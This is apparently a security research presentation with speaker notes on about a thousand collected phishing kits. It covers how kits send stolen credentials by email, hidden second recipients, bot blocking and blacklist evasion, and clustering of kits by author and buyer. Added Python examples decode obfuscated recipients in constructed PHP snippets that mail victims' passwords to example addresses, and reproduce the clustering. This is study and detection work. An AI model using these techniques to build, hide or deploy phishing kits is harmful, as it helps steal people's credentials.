© 2017 Imperva, Inc. All rights reserved.
From Zero to Phishing in 60 Seconds
Luda Lazar, Imperva Research Team
June 2017
Introduction
Introduction & Goals
• How to set up a phishing campaign in 60 seconds?
• Phishing kits examples and their main capabilities
• Statistical analysis
• Clustering analysis
How to Setup a Phishing Campaign in 60 Seconds?
Diagram of the campaign building blocks:
• Spam Service / [SMTP] Server
• Email List
• Compromised Server or Hosting Services
• Phishing Pages
Phishing Attack
Diagram of the attack flow between Attacker, Phishing Site, Victim and Email Account:
2. Send phishing email
3. Visit phishing page
4. Send stolen credentials
5. Harvest new credentials
The Research from 20,000 feet
Research pipeline (diagram): Phishing sites sources → Obtaining phishing kits → Extracting features → Analyzing phishing kits → Conclusions
Numbers
• OpenPhish feed:
– Total number of phishing URLs: 8388 (after noise cleanup)
– Total number of phishing kits: 591 (7%)
• TechHelpList.com pastes (all URLs of the last year):
– Total number of phishing URLs: 4463
– Total number of phishing kits: 428 DIY kits (9.6%)
• Total: 1019 kits
Phishing Kits Examples
Phishing Kit Structure
• Phishing kits contain two types of files:
– Files needed to display a copy of the targeted web site (resource files)
– Scripts used to save the phished information and send it to the phishers
Google Docs Phishing Kit
Phishing Processing Code
Phishing Kit Capabilities
Drop Mechanisms of Phishing Kits
• 98% of kits use email to send the data to the attackers
• 2% of kits save the collected data on the server in a log file
(in one kit the results were stored in a DB)
Chart: Remote, 98%; Local, 2%
Implicit Recipients
• About 25% of DIY kits contain hidden drops, secretly sending emails with the
phished information to addresses other than the intended ones
– Address Obfuscation
– Repeated mail statements
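To show how an analyst can surface such hidden drops when reviewing a kit, here is an added Python example (not code from the Imperva research) that resolves the recipient of every mail() call in a constructed kit processing script, following simple variable assignments, string concatenation and base64_decode() wrappers, and flags kits with repeated mail statements or more than one recipient. The PHP sample and the example.invalid addresses are constructed for the example.

```python
import base64
import re

# Constructed sample of a kit's result-processing script (not a real kit).
# Addresses use the reserved example.invalid domain; the second mail() call
# hides its recipient behind base64, the third builds it by concatenation.
HIDDEN_B64 = base64.b64encode(b"author@example.invalid").decode()
SAMPLE_PHP = rf'''<?php
$recipient = "buyer@example.invalid";
$subject = "Result from Google Docs";
$message = "Email: " . $_POST['email'] . "\nPass: " . $_POST['pass'];
mail($recipient, $subject, $message, $headers);
$d = base64_decode("{HIDDEN_B64}");
mail($d, $subject, $message, $headers);
mail("buyer" . "@" . "example.invalid", $subject, $message, $headers);
?>'''

STRING_LITERAL = re.compile(r'"([^"]*)"|\'([^\']*)\'')
ASSIGNMENT = re.compile(r'^\s*(\$\w+)\s*=\s*(.+?);\s*$', re.M)
# First argument of mail(): everything up to the first comma (single-line calls).
MAIL_CALL = re.compile(r'\bmail\s*\(\s*(.+?)\s*,')
BASE64_WRAP = re.compile(r'base64_decode\(\s*(.+?)\s*\)')


def split_concat(expr):
    """Split a PHP expression on '.' outside quotes and parentheses."""
    parts, buf, quote, depth = [], [], None, 0
    for ch in expr:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            buf.append(ch)
        elif ch == "." and depth == 0:
            parts.append("".join(buf))
            buf = []
        else:
            depth += (ch == "(") - (ch == ")")
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts]


def eval_expr(expr, env):
    """Resolve a small subset of PHP string expressions; None if unresolvable."""
    expr = expr.strip()
    m = BASE64_WRAP.fullmatch(expr)
    if m:
        inner = eval_expr(m.group(1), env)
        return base64.b64decode(inner).decode() if inner else None
    parts = split_concat(expr)
    if len(parts) > 1:
        vals = [eval_expr(p, env) for p in parts]
        return None if any(v is None for v in vals) else "".join(vals)
    m = STRING_LITERAL.fullmatch(expr)
    if m:
        return m.group(1) if m.group(1) is not None else m.group(2)
    return env.get(expr) if expr.startswith("$") else None


def is_obfuscated(expr):
    """True when the recipient is not written as one plain string literal."""
    return "base64_decode" in expr or len(split_concat(expr)) > 1


def mail_recipients(php_source):
    """Return (recipient, obfuscated) for every mail() call, in source order."""
    env, origin = {}, {}
    for m in ASSIGNMENT.finditer(php_source):
        var, expr = m.group(1), m.group(2)
        env[var] = eval_expr(expr, env)
        origin[var] = origin.get(expr.strip(), expr)  # how the value was built
    calls = []
    for m in MAIL_CALL.finditer(php_source):
        expr = m.group(1).strip()
        calls.append((eval_expr(expr, env), is_obfuscated(origin.get(expr, expr))))
    return calls


def hidden_drops(php_source):
    """Summarise the drops; suspect = repeated mail statements or >1 recipient."""
    calls = mail_recipients(php_source)
    resolved = {r for r, _ in calls if r}
    return {
        "mail_calls": len(calls),
        "recipients": sorted(resolved),
        "obfuscated": sorted({r for r, o in calls if r and o}),
        "suspect": len(calls) > 1 or len(resolved) > 1,
    }


if __name__ == "__main__":
    print(hidden_drops(SAMPLE_PHP))
```

A real review would still diff the resolved recipients against the address the kit's buyer configured, since a second address in the list is exactly the implicit recipient described above.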
Extending the Lifespan - Block Unwanted Access
• 17% of DIY kits contain techniques to block unwanted access to them
• Focused on avoiding detection by security companies and index services
– .htaccess
– robots.txt
– PHP scripts
Extending the Lifespan - Blacklist Evasion
• Randomize URL per visitor
– Creates a random phishing kit subdirectory
– Copies the content of the entire kit inside it
– Redirects the visitor to the newly generated random location
Clustering Analysis
Research Method
• Features that characterize a phishing kit
• Statistical analysis
• Clustering:
– Files list (metadata of DIY archive)
– Author’s signature (results processing file)
– Subject (results email)
– Sender (results email ‘from’ header)
• Every cluster of kits has at least one of the features in common
Clustering Results
• Total number of clusters: 230
– 19 clusters (size of each cluster >= 10), covering 541 kits (53% of data)
– 48 clusters (size of each cluster >= 5), covering 731 kits (72% of data)
– 118 clusters (size of each cluster >= 2), covering 907 kits (89% of data)
• Similarity statistics:
– 14% of the kits have four identical features
– 39% of the kits have at least three identical features
– 56% of the kits have at least two identical features
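As an added illustration of the research method and of the cluster and similarity statistics above (example code, not the research team's tooling), this Python block derives the four features per kit (file list, author signature, subject, sender), links kits that share at least one feature value with union-find, and computes cluster coverage by minimum size and the share of kits having at least k identical features with some other kit. The kit records are constructed sample data, not the research data set.

```python
import hashlib
from collections import defaultdict

FEATURES = ("files", "signature", "subject", "sender")

# Constructed sample kit records (not data from the research). Empty strings
# mean the feature is absent, e.g. an unsigned kit or a kit that logs locally.
KITS = {
    "kit01": {"files": ["index.php", "post.php", "css/style.css"],
              "signature": "alpha", "subject": "Result", "sender": "a@example.invalid"},
    "kit02": {"files": ["index.php", "post.php", "css/style.css"],
              "signature": "alpha", "subject": "Result", "sender": "a@example.invalid"},
    "kit03": {"files": ["login.php", "next.php"],
              "signature": "alpha", "subject": "New login", "sender": "b@example.invalid"},
    "kit04": {"files": ["login.php", "next.php"],
              "signature": "", "subject": "New login", "sender": "c@example.invalid"},
    "kit05": {"files": ["dropbox.html", "go.php"],
              "signature": "beta", "subject": "Dropbox", "sender": "d@example.invalid"},
    "kit06": {"files": ["office.html", "send.php"],
              "signature": "", "subject": "", "sender": ""},
}


def feature_values(kit):
    """Hashable value per feature; the file list becomes a digest of its sorted names."""
    values = {}
    for f in FEATURES:
        v = kit.get(f)
        if f == "files":
            v = hashlib.sha256("\n".join(sorted(v)).encode()).hexdigest() if v else ""
        if v:
            values[f] = v
    return values


def cluster(kits):
    """Union-find: kits sharing at least one feature value land in one cluster."""
    parent = {k: k for k in kits}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    first_seen = {}  # (feature, value) -> first kit carrying it
    for name, kit in kits.items():
        for item in feature_values(kit).items():
            if item in first_seen:
                parent[find(name)] = find(first_seen[item])
            else:
                first_seen[item] = name
    groups = defaultdict(list)
    for k in kits:
        groups[find(k)].append(k)
    return sorted((sorted(g) for g in groups.values()), key=len, reverse=True)


def coverage(clusters, min_size):
    """(number of clusters of at least min_size, share of all kits they cover)."""
    total = sum(len(c) for c in clusters)
    big = [c for c in clusters if len(c) >= min_size]
    return len(big), sum(len(c) for c in big) / total


def max_shared_features(kits):
    """For each kit, the largest number of identical features with any other kit."""
    fv = {k: feature_values(v) for k, v in kits.items()}
    return {
        a: max((sum(1 for f, val in fv[a].items() if fv[b].get(f) == val)
                for b in kits if b != a), default=0)
        for a in kits
    }


def share_with_at_least(kits, k):
    """Fraction of kits that have at least k identical features with another kit."""
    best = max_shared_features(kits)
    return sum(1 for v in best.values() if v >= k) / len(kits)


if __name__ == "__main__":
    clusters = cluster(KITS)
    print("clusters:", clusters)
    for n in (2, 3):
        print(f"clusters of size >= {n}:", coverage(clusters, n))
    for k in (4, 3, 2):
        print(f"kits with >= {k} identical features: {share_with_at_least(KITS, k):.0%}")
```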
Phishing Kits Graph
Author Signature
Total number of author signatures: 271
• 32% of kits did not contain an author's signature
• 17% of kits were signed with a unique signature
• 51% of kits were signed with a non-unique signature
Fud Tool Dot Com
Kits’ Buyers (Results Email Recipients)
• Total number of buyers: 715 (distinct addresses)
• 8% of buyers appear in at least three different kits (represent 23% of kits)
• 24% of buyers appear in at least two different kits (represent 46% of kits)
Conclusions
• Phishing is here to stay
– It is still a significant and effective cyber threat
– Phishing DIY kits are a significant facilitator of this, lowering the cost and time it takes to mount a phishing campaign
• The phishing ecosystem resembles legitimate economic ecosystems:
– Role-based ecosystem with technology vendors and service providers
– Phishers phish phishers: some players misbehave...
More Info
• Subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends:
https://www.imperva.com/blog/
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

Research: From zero to phishing in 60 seconds

13. Drop Mechanisms of Phishing Kits
• 98% of kits use email to send data to the attackers
• 2% of kits save the collected data on the server in a log file (in one kit the results were stored in a DB)
[Chart: Remote 98%, Local 2%]
14. Implicit Recipients
• About 25% of DIY kits contain hidden drops, secretly sending emails with the phished information to addresses other than the intended ones
– Address obfuscation
– Repeated mail statements
15. Extending the Lifespan - Block Unwanted Access
• 17% of DIY kits contain techniques to block unwanted access to them
• Focused on avoiding detection by security companies and index services
– htaccess
– robots.txt
– PHP scripts
16. Extending the Lifespan - Blacklist Evasion
• Randomize URL per visitor
– Creates a random phishing kit subdirectory
– Copies the content of the entire kit inside it
– Redirects the visitor to the newly generated random location
17. Clustering Analysis
18. Research Method
• Features characterize a phishing kit
• Statistical analysis
• Clustering:
– Files list (metadata of DIY archive)
– Author’s signature (results processing file)
– Subject (results email)
– Sender (results email ‘from’ header)
• Every cluster of kits has at least one of the features in common
19. Clustering Results
• Total number of clusters: 230
– 19 clusters (each of size ≥ 10), covering 541 kits (53% of data)
– 48 clusters (each of size ≥ 5), covering 731 kits (72% of data)
– 118 clusters (each of size ≥ 2), covering 907 kits (89% of data)
• Similarity statistics:
– 14% of the kits have four identical features
– 39% of the kits have at least three identical features
– 56% of the kits have at least two identical features
20. Phishing Kits Graph
21. Author Signature
Total number of author signatures: 271
• 32% of kits didn’t contain an author’s signature
• 17% of kits were signed with a unique signature
• 51% of kits were signed with a non-unique signature
22. Fud Tool Dot Com
23. Kits’ Buyers (Results Email Recipients)
• Total number of buyers: 715 (distinct addresses)
• 8% of buyers appear in at least three different kits (representing 23% of kits)
• 24% of buyers appear in at least two different kits (representing 46% of kits)
24. Conclusions
• Phishing is here to stay
– It is still a significant and effective cyber threat
– Phishing DIY kits are a significant facilitator, lowering the cost and time it takes to mount a phishing campaign
• The phishing ecosystem resembles legitimate economic ecosystems:
– Role-based ecosystem with technology vendors and service providers
– Phishers phish phishers: some players misbehave…
25. More Info
• Click here to subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends: https://www.imperva.com/blog/

Editor's Notes

Slide 1: Hello, my name is Luda Lazar. I’ve been working at Imperva for 5.5 years. I’m a security researcher.
Slide 2: Introduction
Slide 3: Today I’m going to talk about phishing, particularly about how easy and quick it is to set up a phishing scam. I will present examples of phishing kits and their main capabilities, and I will show statistical and clustering analysis of our collection of phishing kits.
Slide 4: So how do you set up a phishing campaign in 60 seconds? To achieve this goal we need the following components:
• Phishing pages
• Spam service/server: SMTP infrastructure to send massive amounts of email
• Email list for spamming: a list of email addresses (cost depends on country, freshness and targets)
• Compromised servers or hosting services to host the phishing pages: the attacker needs access to compromised legitimate servers to remove the dependency on hosting services and host the phishing pages
Each of these components can be purchased in a few seconds on the Russian black market. In previous research we focused on other components of phishing, such as compromised servers. In the current research we focused on phishing kits, to understand their main capabilities, where they come from and their effect on the phishing market.
Slide 5: How does a standard phishing attack based on a phishing kit look? First, the attacker buys a compromised server (or uses a hosting service) and uploads a phishing kit to the server. Then, using a spam service, the attacker sends a burst of phishing emails to the potential victims. The victims fall into the phishing trap by visiting the phishing pages and entering their credentials. The phishing kit processes the credentials and sends them to an external email account.
Slide 6: Now that we understand the basic flow of a phishing attack based on a phishing kit, we present the high-level flow of our research.
• The first phase of the project was to find sources of phishing sites. We used two different sources to gather phishing kit samples: the OpenPhish feed (https://openphish.com/) for zero-day samples, and pastes from TechHelpList.com for long-lived phishing campaigns.
• In the second phase we developed a kind of scraper, which takes a list of phishing URLs and retrieves phishing kits from the backend of the phishing server. For each URL, if the phishing site was online and allowed directory listing, we generated a list of paths and tried to locate and download the phishing kit(s).
• The third phase was the definition and retrieval of features from the phishing kits and normalization of the data.
• The fourth stage included statistical analysis of the extracted features and clustering.
• The fifth stage resulted in conclusions based on the previous stage.
Slide 7: From both sources we collected more than a thousand phishing kits in total. From OpenPhish we collected about six hundred samples, which is 7% of all checked URLs. From the pastes we collected more than four hundred kits, which is almost 10% of all checked URLs. Limitations: the main threat to the validity of the statistics presented above is the problem of the “coverage” of the examined kits, i.e., the variety of the recovered kits.
Slide 8: Now let’s discuss the structure of phishing kits and show some examples, including a Google Docs phishing kit.
Slide 9: Phishing kits contain two types of files: resource files, which are needed to display a copy of the targeted web site, and processing scripts, which are used to save the phished information and send it to the phishers.
Slide 10: The following is an example of a common Google Docs phishing kit, which makes up about 15 percent of our collection. The resource files contain Google graphics, CSS and password-validation files. The PHP files are the processing files, which store and send the stolen information to the attacker. The majority of phishing kits contain all the resources required to replicate the targeted web site, including HTML pages, JavaScript and CSS files, images and other media files. This minimizes the number of requests the kit issues to the legitimate site and thus the chances of being detected if the target site analyzes incoming requests. However, a significant share of kits contain links to the target web sites.
Slide 11: The following is the processing code of the Google Docs kit. The first part checks which email provider was selected by the victim (Gmail, Yahoo, Hotmail, AOL or other). Then it retrieves the victim’s details, such as browser and IP address, and using the IP address resolves the victim’s geolocation. The next part builds the phishing results email message. Interestingly, the processing code is signed by the attacker ‘NoBody’. The phishing message contains:
• Email provider
• Email and password of the victim
• IP address
• Geolocation (city, region, country and country code)
The results message is exfiltrated in two ways: it is written to a file and sent to the attacker’s email address. If the email provider is Gmail, the victim is redirected to the next page (verification.php), which lures the victim into entering the recovery email or phone number that Google requires to authenticate from an unrecognized device. The last part redirects the victim to the legitimate landing page of Google Drive.
Slide 12: Following the example of the Google Docs phishing kit, we can now talk about the main capabilities of phishing kits.
Slide 13: One of the main functions of phishing kits is to automatically send the phished information to the attackers. The vast majority, ninety-eight percent, of kits use email accounts to send data to the attackers; 2 percent save the collected information directly on the server.
Slide 14: But what happens when buying from a thief? About 25 percent of kits contain an implicit recipient, which receives emails with the phishing results as well as the intended recipients. We saw multiple techniques to hide the authors’ email addresses, but the most popular are address obfuscation and repeated mail statements. More info: to obfuscate email addresses, kit writers use a variety of techniques, ranging from standard encoding and compression algorithms to simple custom cryptographic methods. Base64 encoding is a popular obfuscation choice: the email address is encoded in its base64 representation and the built-in base64_decode() function is used to retrieve its original value. Another commonly used encoding is ASCII: the address is obfuscated by substituting each character with its ASCII value, typically in hexadecimal, and a function mapping a value to the corresponding character (e.g., the built-in pack() function) is then used to recover the email address. Among custom techniques, obfuscations based on Caesar ciphers are popular: each letter of the email address is replaced with the letter that is some fixed number of positions further down the alphabet. Another common technique is the use of simple permutations.
Slide 15: We have also seen attackers implementing techniques to block unwanted access to their phishing kits, as they may want to prevent Google, Yahoo or security-company bots from finding them. Some of the techniques include:
• .htaccess files with a list of blocked IP addresses related to bots from search engines and security companies.
• robots.txt files, used to prevent search-engine or security-company bots from accessing specific remote directories.
• PHP scripts that dynamically check whether the remote IP address is allowed to access the phishing pages. These scripts are often included as part of the phishing kit.
17% of deployment kits contain techniques to block unwanted access to their phishing kits in order to avoid detection by security companies and index services.
Slide 16: The next technique is blacklist evasion, which is based on redirecting each new victim to a newly generated random location.
Slide 17: The last part of the presentation contains our similarity analysis of the phishing kits.
Slide 18: First, let’s describe our research method. We extracted features that characterize phishing kits, computed statistics on certain features of the kits, and then performed unsupervised machine learning on the extracted features. The features we chose:
• Files list (metadata of the phishing archive)
• Author’s signature (results processing file)
• Subject (results email)
• Sender (results email ‘from’ header)
We cluster the data so that every cluster of kits has at least one of the features in common:
• Extracting features that characterize a phishing kit
• Cleaning up and normalizing the features’ data
• Clustering the data so that every cluster of kits has at least one of the features in common
Slide 19: The clustering results: we got 230 clusters in total.
• 19 big clusters (with at least 10 kits in each cluster) covering 53 percent of the data
• 48 clusters (with at least 5 kits in each cluster) covering 73 percent of the data
• 118 clusters (with at least 2 kits in each cluster) covering 89 percent of the data
• 14% of the kits have four identical features
• 39% of the kits have at least three identical features
• 56% of the kits have at least two identical features
• 14% of the kits have four identical features, 25% of the kits have three identical features and 16% of the kits have two identical features
Slide 20: Biggest cluster: 153; second: 78; third: 66; fourth: 27; fifth: 24; sixth: 20; …
Slide 21: The following are general statistics on the author feature.
Slide 22: We searched for one of the popular signatures and found a few interesting sites.
Slide 23: The following are general statistics on the buyers feature: 8% of buyers appear in at least three different kits (representing 23% of kits); 24% of buyers appear in at least two different kits (representing 46% of kits).
Slide 24: In conclusion, kit authors minimize the effort and risks associated with deploying the phishing site and attracting victims, and maximize their return on investment by harvesting the work of unaware users.
Slide 25: Click here to subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends: https://www.imperva.com/blog/
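The hidden drops and address obfuscation described in the notes for slide 14 can be surfaced when analyzing a kit by locating every mail() call in its results-processing script and decoding the recipient expression. This is an added Python example, not the research team's tooling; the PHP snippet and all addresses in it are constructed, and it handles only the base64_decode() and pack("H*", ...) forms the notes describe.

```python
import base64
import re

# Constructed sample of a kit's results-processing script (not taken from a real kit):
# the intended buyer address, a base64-obfuscated hidden drop and a hex-encoded one.
SAMPLE_PHP = r"""<?php
$msg = "Email: $email\nPass: $pass\nIP: $ip\n";
$to = "buyer@example.com";
mail($to, "Results", $msg);
mail(base64_decode("YXV0aG9yQGV4YW1wbGUubmV0"), "Results", $msg);
mail(pack("H*", "64726f70406578616d706c652e6f7267"), "Results", $msg);
header("Location: https://drive.google.com/");
"""

MAIL_OPEN = re.compile(r"\bmail\s*\(")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(\"[^\"]*\"|'[^']*')\s*;")
DECODERS = {  # obfuscation kind -> (pattern for the recipient expression, decoder)
    "base64": (re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)"),
               lambda s: base64.b64decode(s, validate=True)),
    "hex": (re.compile(r"pack\(\s*[\"']H\*[\"']\s*,\s*[\"']([0-9a-fA-F]+)[\"']\s*\)"),
            bytes.fromhex),
}

def first_argument(src, open_paren):
    """Text of the first argument of the call whose '(' is at src[open_paren]."""
    depth, quote = 0, None
    for i in range(open_paren, len(src)):
        ch = src[i]
        if quote:                       # inside a string literal: ignore ( ) ,
            quote = None if ch == quote else quote
        elif ch in "\"'":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i].strip()
        elif ch == "," and depth == 1:  # comma at the call's own level ends arg 1
            return src[open_paren + 1:i].strip()
    return ""

def resolve_recipient(expr, assignments):
    """Reduce a recipient expression to (address or None, obfuscation kind)."""
    expr = assignments.get(expr, expr)  # $to -> its string literal, if assigned
    if re.fullmatch(r"[\"'][^\"']+[\"']", expr):
        return expr[1:-1], "plain"
    for kind, (pattern, decode) in DECODERS.items():
        if m := pattern.fullmatch(expr):
            try:
                return decode(m.group(1)).decode(), kind
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None, kind
    return None, "unknown"

def find_drops(php_source):
    """List (recipient, kind) for every mail() call in the script, in order."""
    assignments = dict(ASSIGN.findall(php_source))
    return [resolve_recipient(first_argument(php_source, m.end() - 1), assignments)
            for m in MAIL_OPEN.finditer(php_source)]

def hidden_drop_report(php_source, intended):
    """Count mail() calls and flag recipients other than the intended buyer."""
    drops = find_drops(php_source)
    hidden = sorted({a for a, _ in drops if a and a != intended})
    return {"mail_calls": len(drops),
            "obfuscated": sum(k != "plain" for _, k in drops),
            "hidden_recipients": hidden}
```

Running hidden_drop_report(SAMPLE_PHP, "buyer@example.com") reports three mail() calls, two obfuscated recipients and the two hidden drops the buyer never sees; a repeated-mail-statement count above one is itself the first signal the notes describe.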
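The clustering method from the notes for slide 18 and the cluster statistics of slide 19 can be reproduced on a small constructed data set: kits that share at least one feature value are joined transitively (a union-find over the four feature values), and the coverage-by-cluster-size and identical-feature shares are then computed from the result. This is an added example in Python, not the team's own analysis code; the kit records and feature values are placeholders.

```python
from collections import defaultdict
from itertools import combinations

# Constructed kit records (not the research data set): each kit carries the four
# features the study clusters on. Values are placeholders; None means "absent".
KITS = {
    "kit-01": {"files": "files-A", "author": "NoBody", "subject": "Results",    "sender": "admin@host"},
    "kit-02": {"files": "files-A", "author": "NoBody", "subject": "Results",    "sender": "admin@host"},
    "kit-03": {"files": "files-B", "author": "NoBody", "subject": "New Rezult", "sender": "x@host"},
    "kit-04": {"files": "files-C", "author": None,     "subject": "New Rezult", "sender": "x@host"},
    "kit-05": {"files": "files-D", "author": "Mr.X",   "subject": "Login",      "sender": "y@host"},
    "kit-06": {"files": "files-D", "author": "Mr.X",   "subject": "Login",      "sender": "z@host"},
    "kit-07": {"files": "files-E", "author": None,     "subject": "Docs",       "sender": None},
}

def cluster_kits(kits):
    """Group kits so that any two sharing at least one feature value end up in the
    same cluster (transitively). Returns the clusters, largest first."""
    parent = {k: k for k in kits}

    def find(k):                         # union-find root lookup with path halving
        while parent[k] != k:
            parent[k] = parent[parent[k]]
            k = parent[k]
        return k

    owners = defaultdict(list)           # (feature, value) -> kits carrying it
    for kit, feats in kits.items():
        for feat, val in feats.items():
            if val is not None:
                owners[(feat, val)].append(kit)
    for members in owners.values():      # every shared value joins its owners
        for other in members[1:]:
            parent[find(other)] = find(members[0])
    groups = defaultdict(list)
    for kit in kits:
        groups[find(kit)].append(kit)
    return sorted(groups.values(), key=len, reverse=True)

def coverage(clusters, total, min_size):
    """Number of clusters with at least min_size kits and the share of kits they cover."""
    big = [c for c in clusters if len(c) >= min_size]
    return len(big), sum(map(len, big)) / total

def identical_feature_counts(kits):
    """For each kit, the largest number of features it has identical to another kit."""
    best = {k: 0 for k in kits}
    for a, b in combinations(kits, 2):
        shared = sum(1 for f in kits[a]
                     if kits[a][f] is not None and kits[a][f] == kits[b][f])
        best[a] = max(best[a], shared)
        best[b] = max(best[b], shared)
    return best

def similarity_shares(kits):
    """Share of kits having at least k identical features with some other kit."""
    best = identical_feature_counts(kits)
    return {k: sum(v >= k for v in best.values()) / len(kits) for k in (2, 3, 4)}
```

On the sample, kit-03 joins kit-01/kit-02 through the shared "NoBody" signature and kit-04 through the shared subject and sender, which is exactly how a single common feature pulls otherwise different kits into one cluster.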